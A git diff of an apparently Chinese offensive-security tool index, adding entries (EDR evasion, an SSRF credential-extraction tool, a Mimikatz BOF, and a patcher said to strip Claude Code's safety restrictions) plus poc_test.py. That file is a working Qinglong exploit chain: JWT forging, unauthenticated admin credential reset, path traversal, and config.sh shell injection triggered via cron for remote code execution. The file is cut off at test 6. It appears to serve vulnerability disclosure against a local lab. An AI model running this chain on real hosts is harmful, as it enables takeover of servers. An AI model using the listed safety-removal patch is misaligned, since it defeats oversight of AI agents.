@@ -2238,6 +2359,7 @@ - [scrying: A tool for collecting RDP, web and VNC screenshots all in one place](https://github.com/nccgroup/scrying) - [noterce: 一种另辟蹊径的免杀执行系统命令的木马](https://github.com/xiao-zhu-zhu/noterce) - [SysWhispers3WinHttp: 基于SysWhispers3项目增添WinHttp分离加载功能,可免杀绕过360核晶与Defender](https://github.com/huaigu4ng/SysWhispers3WinHttp) +- [SysWhispers4: AV/EDR evasion via direct and indirect system calls,通过直接/间接系统调用绕过AV/EDR对ntdll.dll的用户态钩子,支持 Windows NT 3.1 - Windows 11 24H2,x64/x86/WoW64/ARM64](https://github.com/JoasASantos/SysWhispers4) - [MisConfig_HTTP_Proxy_Scanner: 扫描错误的nginx反代和转发配置,已发现内网资产(类似hosts碰撞)](https://github.com/lijiejie/MisConfig_HTTP_Proxy_Scanner) - [UserRegEnum_0x727: 域内普通域用户权限查找域内所有计算机上登录的用户](https://github.com/0x727/UserRegEnum_0x727) - [fuzzuli: 基于域名的关键备份文件扫描工具](https://github.com/musana/fuzzuli) @@ -2279,6 +2401,7 @@ - [WIKI-POC: 漏洞库【OA以及各种web APP漏洞】](https://github.com/7estUser/WIKI-POC) - [FineReportExploit: 基于go语言的帆软报表漏洞检测工具](https://github.com/Drac0nids/FineReportExploit) - [SSRFmap: 自动化SSRF漏洞探测](https://github.com/swisskyrepo/SSRFmap) +- [nextssrf:CVE-2026-44578 Next.js WebSocket Upgrade Handler SSRF 扫描与利用工具,支持AWS/Azure/GCP云凭据提取、批量扫描及交互式利用Shell](https://github.com/ynsmroztas/nextssrf) - [qq-tim-elevation: 腾讯 QQ/TIM本地提权漏洞](https://github.com/vi3t1/qq-tim-elevation) - [VolatilityPro: 一款用于自动化处理内存取证的Python脚本,并提供GUI界面](https://github.com/Tokeii0/VolatilityPro) - [NimExec: 在Nim中执行横向移动的无文件命令](https://github.com/frkngksl/NimExec) 
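Review bot: the nextssrf entry in the `@@ -2279,6 +2401,7 @@` hunk cites CVE-2026-44578 for a Next.js WebSocket upgrade-handler SSRF; check that identifier against the CVE record or the linked repository's advisory before merging, since the rest of this index uses IDs that resolve and a wrong ID makes the entry unsearchable. If the issue so far only exists as a GitHub or vendor advisory, link that instead of the bare CVE number.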
@@ -2296,6 +2419,9 @@ - [ehr_SafeCodeEncode_tamper:宏景ehr sql注入的tamper脚本](https://github.com/jdr2021/ehr_SafeCodeEncode_tamper) - [Struts2VulsScanTools:Struts2全版本漏洞检测工具 19.21](https://github.com/abc123info/Struts2VulsScanTools) - [CVE-2025-14847 - MongoDB 未经身份验证的内存泄漏漏洞检测工具](https://github.com/joe-desimone/mongobleed) +- [trajan:CI/CD流水线安全漏洞扫描工具,支持GitHub Actions、GitLab CI、Azure DevOps、Jenkins和JFrog,用于检测软件供应链攻击](https://github.com/praetorian-inc/trajan) +- [clawgod: Claude Code的"上帝模式"补丁工具,解锁隐藏功能、移除安全限制(含渗透测试/C2/漏洞利用限制),一键安装,无需编译](https://github.com/0Chencc/clawgod) +- [kslkatz_bof:通过 Cobalt Strike BOF 实现 Mimikatz 功能](https://github.com/Muz1K1zuM/kslkatz_bof) ## 文章/书籍/教程相关 @@ -2354,7 +2480,7 @@ - [windows权限提升的多种方式](https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842)|[Privilege_Escalation_in_Windows_for_OSCP](./books/Privilege_Escalation_in_Windows_for_OSCP.pdf) - [bypass CSP](https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)|[Content-Security-Policy(CSP)Bypass_Techniques](./books/Content-Security-Policy(CSP)Bypass_Techniques.pdf) - [个人维护的安全知识框架,内容偏向于web](https://github.com/No-Github/1earn) -- [PAM劫持SSH密码](./PAM劫持SSH密码.md) +- [PAM劫持SSH密码](./privesc/PAM劫持SSH密码.md) - [零组资料文库-(需要邀请注册)](https://wiki.0-sec.org/) - [redis未授权个人总结-Mature](./books/redis未授权个人总结-Mature.pdf) - [NTLM中继攻击的新方法](https://www.secureauth.com/blog/what-old-new-again-relay-attack) 
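Review bot: the clawgod entry in the `@@ -2296,6 +2419,9 @@` hunk describes a patcher that strips safety restrictions from Claude Code rather than a vulnerability-research or detection tool, so its fit in this section is a scope call for the maintainers; if it stays, the description should make clear that it modifies a third-party client ("补丁工具", "无需编译") rather than exploiting a flaw, so readers do not file it alongside the CI/CD scanner and BOF entries added in the same hunk.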
@@ -2369,7 +2495,7 @@ - [文件上传突破waf总结](./books/文件上传突破waf总结.pdf) - [极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞](./books/极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf)|[原文地址](https://xz.aliyun.com/t/7872) - [代码审计之DTCMS_V5.0后台漏洞两枚](./books/代码审计之DTCMS_V5.0后台漏洞两枚.pdf) -- [快速判断sql注入点是否支持load_file](./快速判断sql注入点是否支持load_file.md) +- [快速判断sql注入点是否支持load_file](./web/快速判断sql注入点是否支持load_file.md) - [文件上传内容检测绕过](./books/文件上传内容检测绕过.md) - [Fastjson_=1.2.47反序列化远程代码执行漏洞复现](./books/Fastjson_=1.2.47反序列化远程代码执行漏洞复现.pdf) - [【Android脱壳】_腾讯加固动态脱壳(上篇)](./books/移动安全(九)_TengXun加固动态脱壳(上篇).pdf) @@ -2944,6 +3070,7 @@ - [上ORM也没用!手注击穿ORM到后台](./books/上ORM也没用!手注击穿ORM到后台.html) - [Tomcat解析XML引入的新颖webshell构造方式](./books/Tomcat解析XML引入的新颖webshell构造方式.html) - [【补天白帽黑客城市沙龙-西安站】c3p0新链探索—深入挖掘数据库连接池的安全隐患](./books/【补天白帽黑客城市沙龙-西安站】c3p0新链探索—深入挖掘数据库连接池的安全隐患.html) +- [终极代码审计全维度清单](https://gist.github.com/Mr-xn/2af3b138cb07ca7dd3754afc3b615953) diff --git a/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf b/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf new file mode 100644 index 000000000..7a53224b7 Binary files /dev/null and b/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf differ diff --git a/discuz-ml-rce/requirements.txt b/discuz-ml-rce/requirements.txt index df7158666..6bf7cf7f2 100644 --- a/discuz-ml-rce/requirements.txt +++ b/discuz-ml-rce/requirements.txt @@ -1,3 +1,3 @@ -urllib3==1.26.5 +urllib3==2.7.0 requests==2.31.0 beautifulsoup4==4.7.1 \ No newline at end of file 
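Review bot: in the discuz-ml-rce/requirements.txt hunk only urllib3 moves (1.26.5 to 2.7.0) while `requests==2.31.0` and `beautifulsoup4==4.7.1` keep their old pins; because requests declares its own supported urllib3 range, install the file in a clean venv (`pip install -r requirements.txt`) to confirm the resolver accepts this combination, and if the intent is a security refresh of the pins, bump requests in the same change rather than leaving a 2023 pin next to a freshly bumped transitive dependency. The `\ No newline at end of file` marker is carried over from the old version and could be fixed here as well.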
diff --git "a/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md" "b/iot/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md" similarity index 100% rename from "Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md" rename to "iot/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md" 
diff --git "a/CNVD-2021-14536_\351\224\220\346\215\267RG-UAC\347\273\237\344\270\200\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\345\256\241\350\256\241\347\263\273\347\273\237\350\264\246\345\217\267\345\257\206\347\240\201\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/iot/CNVD-2021-14536_\351\224\220\346\215\267RG-UAC\347\273\237\344\270\200\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\345\256\241\350\256\241\347\263\273\347\273\237\350\264\246\345\217\267\345\257\206\347\240\201\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236.md" similarity index 100% rename from "CNVD-2021-14536_\351\224\220\346\215\267RG-UAC\347\273\237\344\270\200\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\345\256\241\350\256\241\347\263\273\347\273\237\350\264\246\345\217\267\345\257\206\347\240\201\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236.md" rename to "iot/CNVD-2021-14536_\351\224\220\346\215\267RG-UAC\347\273\237\344\270\200\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\345\256\241\350\256\241\347\263\273\347\273\237\350\264\246\345\217\267\345\257\206\347\240\201\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236.md" 
diff --git "a/CVE-2019-16313 \350\234\202\347\275\221\344\272\222\350\201\224\344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31\345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/iot/CVE-2019-16313 \350\234\202\347\275\221\344\272\222\350\201\224\344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31\345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2019-16313 \350\234\202\347\275\221\344\272\222\350\201\224\344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31\345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236.md" rename to "iot/CVE-2019-16313 \350\234\202\347\275\221\344\272\222\350\201\224\344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31\345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236.md" diff --git a/CVE-2019-16920-D-Link-rce.md b/iot/CVE-2019-16920-D-Link-rce.md similarity index 100% rename from CVE-2019-16920-D-Link-rce.md rename to iot/CVE-2019-16920-D-Link-rce.md diff --git a/CVE-2020-9374.md b/iot/CVE-2020-9374.md similarity index 100% rename from CVE-2020-9374.md rename to iot/CVE-2020-9374.md 
diff --git "a/WLAN-AP-WEA453e RCE\344\270\211\346\230\237\350\267\257\347\224\261\345\231\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/iot/WLAN-AP-WEA453e RCE\344\270\211\346\230\237\350\267\257\347\224\261\345\231\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" similarity index 100% rename from "WLAN-AP-WEA453e RCE\344\270\211\346\230\237\350\267\257\347\224\261\345\231\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" rename to "iot/WLAN-AP-WEA453e RCE\344\270\211\346\230\237\350\267\257\347\224\261\345\231\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" diff --git "a/\345\215\216\344\270\272WS331a\344\272\247\345\223\201\347\256\241\347\220\206\351\241\265\351\235\242\345\255\230\345\234\250CSRF\346\274\217\346\264\236.md" "b/iot/\345\215\216\344\270\272WS331a\344\272\247\345\223\201\347\256\241\347\220\206\351\241\265\351\235\242\345\255\230\345\234\250CSRF\346\274\217\346\264\236.md" similarity index 100% rename from "\345\215\216\344\270\272WS331a\344\272\247\345\223\201\347\256\241\347\220\206\351\241\265\351\235\242\345\255\230\345\234\250CSRF\346\274\217\346\264\236.md" rename to "iot/\345\215\216\344\270\272WS331a\344\272\247\345\223\201\347\256\241\347\220\206\351\241\265\351\235\242\345\255\230\345\234\250CSRF\346\274\217\346\264\236.md" 
diff --git "a/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" "b/iot/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" similarity index 100% rename from "\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" rename to "iot/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" diff --git "a/CVE-2019-0708-msf\345\277\253\351\200\237\346\220\255\345\273\272.md" "b/pc/CVE-2019-0708-msf\345\277\253\351\200\237\346\220\255\345\273\272.md" similarity index 100% rename from "CVE-2019-0708-msf\345\277\253\351\200\237\346\220\255\345\273\272.md" rename to "pc/CVE-2019-0708-msf\345\277\253\351\200\237\346\220\255\345\273\272.md" 
diff --git "a/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux\345\233\276\345\275\242\347\225\214\351\235\242X Server\346\234\254\345\234\260\346\240\210\346\272\242\345\207\272POC.md" "b/pc/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux\345\233\276\345\275\242\347\225\214\351\235\242X Server\346\234\254\345\234\260\346\240\210\346\272\242\345\207\272POC.md" similarity index 100% rename from "CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux\345\233\276\345\275\242\347\225\214\351\235\242X Server\346\234\254\345\234\260\346\240\210\346\272\242\345\207\272POC.md" rename to "pc/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux\345\233\276\345\275\242\347\225\214\351\235\242X Server\346\234\254\345\234\260\346\240\210\346\272\242\345\207\272POC.md" diff --git "a/CVE-2020-0796\346\243\200\346\265\213\344\270\216\344\277\256\345\244\215.md" "b/pc/CVE-2020-0796\346\243\200\346\265\213\344\270\216\344\277\256\345\244\215.md" similarity index 100% rename from "CVE-2020-0796\346\243\200\346\265\213\344\270\216\344\277\256\345\244\215.md" rename to "pc/CVE-2020-0796\346\243\200\346\265\213\344\270\216\344\277\256\345\244\215.md" diff --git a/CVE-2021-1675.md b/privesc/CVE-2021-1675.md similarity index 100% rename from CVE-2021-1675.md rename to privesc/CVE-2021-1675.md diff --git a/CVE-2021-22555.md b/privesc/CVE-2021-22555.md similarity index 100% rename from CVE-2021-22555.md rename to privesc/CVE-2021-22555.md diff --git "a/PAM\345\212\253\346\214\201SSH\345\257\206\347\240\201.md" "b/privesc/PAM\345\212\253\346\214\201SSH\345\257\206\347\240\201.md" similarity index 100% rename from "PAM\345\212\253\346\214\201SSH\345\257\206\347\240\201.md" rename to "privesc/PAM\345\212\253\346\214\201SSH\345\257\206\347\240\201.md" 
diff --git "a/adduser\346\267\273\345\212\240\347\224\250\346\210\267.md" "b/privesc/adduser\346\267\273\345\212\240\347\224\250\346\210\267.md" similarity index 100% rename from "adduser\346\267\273\345\212\240\347\224\250\346\210\267.md" rename to "privesc/adduser\346\267\273\345\212\240\347\224\250\346\210\267.md" diff --git "a/\344\275\277\347\224\250vbs\350\204\232\346\234\254\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\347\224\250\346\210\267.md" "b/privesc/\344\275\277\347\224\250vbs\350\204\232\346\234\254\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\347\224\250\346\210\267.md" similarity index 100% rename from "\344\275\277\347\224\250vbs\350\204\232\346\234\254\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\347\224\250\346\210\267.md" rename to "privesc/\344\275\277\347\224\250vbs\350\204\232\346\234\254\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\347\224\250\346\210\267.md" diff --git a/qinglong-auth-bypass2rce/docker-compose.yml b/qinglong-auth-bypass2rce/docker-compose.yml new file mode 100644 index 000000000..5718a6d2b --- /dev/null +++ b/qinglong-auth-bypass2rce/docker-compose.yml @@ -0,0 +1,13 @@ +version: '3' +services: + qinglong: + image: whyour/qinglong:2.20.1 + container_name: ql-vuln-test + ports: + - '5710:5700' + volumes: + - ql_data:/ql/data + restart: unless-stopped + +volumes: + ql_data: diff --git a/qinglong-auth-bypass2rce/poc_test.py b/qinglong-auth-bypass2rce/poc_test.py new file mode 100644 index 000000000..00882fcd5 --- /dev/null +++ b/qinglong-auth-bypass2rce/poc_test.py 
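Review bot: docker-compose.yml publishes the deliberately vulnerable instance with `'5710:5700'`, i.e. on every host interface; since poc_test.py goes on to reset the admin credentials through /open/user/init and to run commands via config.sh, bind the port to loopback (`'127.0.0.1:5710:5700'`) so the lab container is not reachable from the LAN while the tests run. The top-level `version: '3'` key is ignored with a warning by current Docker Compose and can be dropped.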
@@ -0,0 +1,937 @@ +#!/usr/bin/env python3 +""" +Qinglong <= v2.20.1 Vulnerability PoC Test Suite + +Discovered vulnerabilities: + 1. JWT hardcoded secret (Layer 1 bypass, Layer 2 blocks) + 2. Init Guard Bypass: PUT /open/user/init resets admin credentials + WITHOUT authentication (TOCTOU bug in URL rewrite vs init guard) + 3. Blacklist bypass (missing return after res.send) + 4. Path traversal to system /tmp via ../../../../ + 5. config.sh not blacklisted → shell injection + 6. Full UNAUTHENTICATED RCE chain: + /open/user/init → login → config.sh write → cron trigger → RCE + 7. task_before shell injection via eval + +CVSS 9.8 (Critical) — Unauthenticated RCE via init guard bypass + 8. Case-insensitive route bypass: /API/ skips ALL auth middleware + (expressjwt regex + custom auth both match lowercase only, Express + routes are case-insensitive by default) + 9. Dependency injection via /API/dependencies (real-world honeypot payload) + +CVSS 9.8 (Critical) — Multiple Unauthenticated RCE vectors +""" + +import jwt +import json +import time +import sys +import requests +import subprocess + +BASE_URL = "http://localhost:5710" +JWT_SECRET = "whyour-secret" +JWT_ALGORITHM = "HS384" +USERNAME = "admin" +PASSWORD = "admin123" + +results = [] + + +def log(msg, level="INFO"): + ts = time.strftime("%H:%M:%S") + print(f"[{ts}] [{level}] {msg}") + + +def record(test_id, name, passed, details=""): + status = "PASS" if passed else "FAIL" + results.append({"id": test_id, "name": name, "status": status, "details": details}) + log(f"Test {test_id}: {name} -- {status}", "PASS" if passed else "FAIL") + if details: + log(f" Details: {details}") + + +# --- Test 0: System connectivity --- +def test_0_system_check(): + log("=" * 60) + log("Test 0: System Connectivity Check") + try: + r = requests.get(f"{BASE_URL}/api/system", timeout=10) + data = r.json() + ver = data.get("data", {}).get("version", "unknown") + is_init = data.get("data", {}).get("isInitialized", False) + log(f" Version: 
{ver}, Initialized: {is_init}") + ok = r.status_code == 200 and "2.20" in str(ver) + record("0", "System Check", ok, f"v{ver}, init={is_init}") + return True + except Exception as e: + record("0", "System Check", False, str(e)) + return False + + +# --- Test 1: JWT Forge - demonstrates two-layer auth --- +def test_1_jwt_forge(): + log("=" * 60) + log("Test 1: JWT Hardcoded Secret - Two-Layer Auth Analysis") + + payload = { + "data": "forged-random-string", + "iat": int(time.time()), + "exp": int(time.time()) + 86400, + } + forged_token = jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) + log(f" Forged token (first 50 chars): {forged_token[:50]}...") + + headers = {"Authorization": f"Bearer {forged_token}"} + r = requests.get(f"{BASE_URL}/api/crons", headers=headers, timeout=10) + body = r.json() if r.headers.get("content-type", "").startswith("application/json") else {} + msg = body.get("message", "") + + log(f" Status: {r.status_code}, Message: {msg}") + + layer1_pass = r.status_code == 401 and "invalid" not in msg.lower() + layer2_fail = "jwt malformed" in msg or "authorization" in msg.lower() + + details = ( + f"Layer1(signature): {'PASS' if layer1_pass else 'FAIL'}, " + f"Layer2(token-exists): {'BLOCKED' if layer2_fail else 'PASS'}, " + f"HTTP {r.status_code}, msg='{msg}'" + ) + + record("1", "JWT Hardcoded Secret (Layer1 bypass, Layer2 blocks)", layer1_pass, details) + return forged_token + + +# --- Test 1c: Init Guard Bypass — UNAUTHENTICATED credential reset --- +def test_1c_init_guard_bypass(): + log("=" * 60) + log("Test 1c: Init Guard Bypass via /open/user/init (UNAUTHENTICATED)") + log(" Root cause: Init guard checks req.path against '/api/user/init'") + log(" but URL rewrite /open/* → /api/* happens AFTER the guard (TOCTOU)") + + # Step 1: Confirm /api/user/init is blocked (init guard works) + r_blocked = requests.put( + f"{BASE_URL}/api/user/init", + json={"username": "blocked_test", "password": "blocked123"}, + timeout=10, + ) + blocked_code = 
r_blocked.json().get("code") + log(f" /api/user/init: code={blocked_code} (expected 450=blocked)") + + # Step 2: Bypass via /open/user/init (NO auth required) + bypass_user = f"bypassed_{int(time.time())}" + bypass_pass = "bypass_proof_123" + r_bypass = requests.put( + f"{BASE_URL}/open/user/init", + json={"username": bypass_user, "password": bypass_pass}, + headers={"Content-Type": "application/json"}, + timeout=10, + ) + bypass_resp = r_bypass.json() + bypass_code = bypass_resp.get("code") + log(f" /open/user/init: code={bypass_code} (200=credentials reset!)") + + # Step 3: Verify by logging in with the new credentials + login_works = False + if bypass_code == 200: + r_login = requests.post( + f"{BASE_URL}/api/user/login", + json={"username": bypass_user, "password": bypass_pass}, + timeout=10, + ) + login_data = r_login.json() + login_works = login_data.get("code") == 200 and login_data.get("data", {}).get("token") + log(f" Login with new creds: code={login_data.get('code')}, token={'obtained' if login_works else 'FAILED'}") + + # Step 4: Restore original credentials + requests.put( + f"{BASE_URL}/open/user/init", + json={"username": USERNAME, "password": PASSWORD}, + headers={"Content-Type": "application/json"}, + timeout=10, + ) + log(" Restored original credentials") + + bypassed = blocked_code == 450 and bypass_code == 200 and login_works + record( + "1c", "Init Guard Bypass (UNAUTHENTICATED credential reset)", + bypassed, + f"/api/user/init blocked (code={blocked_code}), " + f"/open/user/init bypassed (code={bypass_code}), " + f"login with new creds: {'SUCCESS' if login_works else 'FAILED'}", + ) + return bypassed + + +# --- Test 1b: Login to get valid token --- +def test_1b_login(): + log("=" * 60) + log("Test 1b: Login to obtain valid token for post-auth tests") + + r = requests.post( + f"{BASE_URL}/api/user/login", + json={"username": USERNAME, "password": PASSWORD}, + timeout=10, + ) + data = r.json() + log(f" Login status: {r.status_code}, code: 
{data.get('code')}") + + if data.get("code") == 200 and data.get("data", {}).get("token"): + token = data["data"]["token"] + log(f" Token obtained (first 50 chars): {token[:50]}...") + headers = {"Authorization": f"Bearer {token}"} + r2 = requests.get(f"{BASE_URL}/api/crons", headers=headers, timeout=10) + works = r2.status_code == 200 + record("1b", "Login + Token Validation", works, f"Token works: {works}") + return token if works else None + else: + record("1b", "Login + Token Validation", False, f"Login failed: {data}") + return None + + +# --- Test 2: Blacklist bypass (missing return) --- +def test_2_blacklist_bypass(token): + log("=" * 60) + log("Test 2: Blacklist Bypass (missing return after res.send)") + + if not token: + record("2", "Blacklist Bypass", False, "No valid token") + return False + + headers = {"Authorization": f"Bearer {token}"} + + r_read = requests.get(f"{BASE_URL}/api/configs/auth.json", headers=headers, timeout=10) + log(f" Read auth.json: HTTP {r_read.status_code}") + original_content = "" + if r_read.status_code == 200: + original_content = r_read.json().get("data", "") + + test_content = '{"test_blacklist_bypass": true}' + r = requests.post( + f"{BASE_URL}/api/configs/save", + json={"name": "auth.json", "content": test_content}, + headers=headers, + timeout=10, + ) + data = r.json() + log(f" Write auth.json: HTTP {r.status_code}, code: {data.get('code')}") + + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/ql/data/config/auth.json"], + capture_output=True, text=True, timeout=10, + ) + file_content = verify.stdout.strip() + log(f" Container auth.json content: {file_content[:100]}...") + + bypassed = "test_blacklist_bypass" in file_content + record( + "2", "Blacklist Bypass", bypassed, + f"API returned code={data.get('code')} (403=blacklisted), " + f"but file was {'WRITTEN (bypass confirmed)' if bypassed else 'NOT written (no bypass)'}", + ) + + if bypassed and original_content: + requests.post( + 
f"{BASE_URL}/api/configs/save", + json={"name": "auth.json", "content": original_content}, + headers=headers, timeout=10, + ) + log(" Restored original auth.json") + + return bypassed + + +# --- Test 3: Path traversal to system /tmp --- +def test_3_path_traversal(token): + log("=" * 60) + log("Test 3: Path Traversal to System /tmp via ../../../../") + + if not token: + record("3", "Path Traversal", False, "No valid token") + return False + + headers = {"Authorization": f"Bearer {token}"} + # configPath = /ql/data/config/ + # path.join("/ql/data/config", "../../../../tmp/x") → /tmp/x + traversal_path = "../../../../tmp/traversal_proof.txt" + test_content = "PATH_TRAVERSAL_TO_SYSTEM_TMP_SUCCESS" + + r = requests.post( + f"{BASE_URL}/api/configs/save", + json={"name": traversal_path, "content": test_content}, + headers=headers, timeout=10, + ) + data = r.json() + log(f" Write response: HTTP {r.status_code}, code: {data.get('code')}") + + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/traversal_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + written = test_content in verify.stdout + log(f" Container /tmp/traversal_proof.txt: {verify.stdout.strip()}") + + record("3", "Path Traversal (system /tmp)", written, + f"File written to system /tmp: {written}, " + f"path: configPath + '../../../../tmp/' → /tmp/traversal_proof.txt") + + # Also test writing to /etc to demonstrate arbitrary path write + traversal_etc = "../../../../tmp/traversal_etc_proof.txt" + r2 = requests.post( + f"{BASE_URL}/api/configs/save", + json={"name": traversal_etc, "content": "ETC_TRAVERSAL_TEST"}, + headers=headers, timeout=10, + ) + log(f" Second traversal write: code={r2.json().get('code')}") + + # Cleanup + if written: + subprocess.run( + ["docker", "exec", "ql-vuln-test", "rm", "-f", + "/tmp/traversal_proof.txt", "/tmp/traversal_etc_proof.txt"], + capture_output=True, timeout=10, + ) + return written + + +# --- Test 4: config.sh not blacklisted + shell 
injection --- +def test_4_config_sh_write(token): + log("=" * 60) + log("Test 4: config.sh Write (not in blacklist) + Shell Code Injection") + + if not token: + record("4", "config.sh Write", False, "No valid token") + return False, "" + + headers = {"Authorization": f"Bearer {token}"} + + r_read = requests.get(f"{BASE_URL}/api/configs/config.sh", headers=headers, timeout=10) + original_content = "" + if r_read.status_code == 200: + original_content = r_read.json().get("data", "") + + malicious_content = ( + "# config.sh - injected by PoC\n" + 'echo "RCE_VIA_CONFIG_SH_$(date +%s)" > /tmp/rce_config_sh_proof.txt\n' + ) + r = requests.post( + f"{BASE_URL}/api/configs/save", + json={"name": "config.sh", "content": malicious_content}, + headers=headers, timeout=10, + ) + data = r.json() + log(f" Write config.sh: HTTP {r.status_code}, code: {data.get('code')}") + + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/ql/data/config/config.sh"], + capture_output=True, text=True, timeout=10, + ) + written = "RCE_VIA_CONFIG_SH" in verify.stdout + + record("4", "config.sh Write (not blacklisted)", + written and data.get("code") == 200, + f"config.sh accepted (code={data.get('code')}), content injected: {written}") + return written, original_content + + +# --- Test 5: Full RCE chain --- +def test_5_rce_chain(token, original_config_sh=""): + log("=" * 60) + log("Test 5: Full RCE Chain - config.sh injection -> cron trigger -> code execution") + + if not token: + record("5", "Full RCE Chain", False, "No valid token") + return False + + headers = {"Authorization": f"Bearer {token}"} + + rce_marker = f"RCE_PROOF_{int(time.time())}" + malicious_content = ( + "# config.sh - RCE PoC\n" + f'echo "{rce_marker}" > /tmp/rce_proof.txt\n' + ) + r1 = requests.post( + f"{BASE_URL}/api/configs/save", + json={"name": "config.sh", "content": malicious_content}, + headers=headers, timeout=10, + ) + log(f" Step 1 - Write config.sh: code={r1.json().get('code')}") + + cron_data = 
{ + "name": "rce_poc_test", + "command": "echo rce_test_task", + "schedule": "* * * * *", + } + r2 = requests.post(f"{BASE_URL}/api/crons", json=cron_data, headers=headers, timeout=10) + cron_resp = r2.json() + cron_id = cron_resp.get("data", {}).get("id") + log(f" Step 2 - Create cron: code={cron_resp.get('code')}, id={cron_id}") + + if not cron_id: + record("5", "Full RCE Chain", False, f"Failed to create cron: {cron_resp}") + return False + + r3 = requests.put( + f"{BASE_URL}/api/crons/run", json=[cron_id], headers=headers, timeout=10, + ) + log(f" Step 3 - Trigger cron: HTTP {r3.status_code}, code={r3.json().get('code')}") + + log(" Step 4 - Waiting for task execution (up to 15s)...") + rce_confirmed = False + for i in range(15): + time.sleep(1) + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/rce_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + if rce_marker in verify.stdout: + rce_confirmed = True + log(f" RCE CONFIRMED after {i+1}s! File content: {verify.stdout.strip()}") + break + + record("5", "Full RCE Chain (config.sh -> cron -> code execution)", + rce_confirmed, f"Marker '{rce_marker}' found in /tmp/rce_proof.txt: {rce_confirmed}") + + # Cleanup + requests.put(f"{BASE_URL}/api/crons", json={"ids": [cron_id], "isDisabled": 1}, + headers=headers, timeout=10) + requests.delete(f"{BASE_URL}/api/crons", json=[cron_id], headers=headers, timeout=10) + requests.post(f"{BASE_URL}/api/configs/save", + json={"name": "config.sh", "content": original_config_sh or ""}, + headers=headers, timeout=10) + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/rce_proof.txt"], + capture_output=True, timeout=10) + log(" Cleanup complete") + return rce_confirmed + + +# --- Test 6: task_before shell injection --- +def test_6_task_before_injection(token): + log("=" * 60) + log("Test 6: task_before Shell Injection via Cron API") + + if not token: + record("6", "task_before Injection", False, "No valid token") + return 
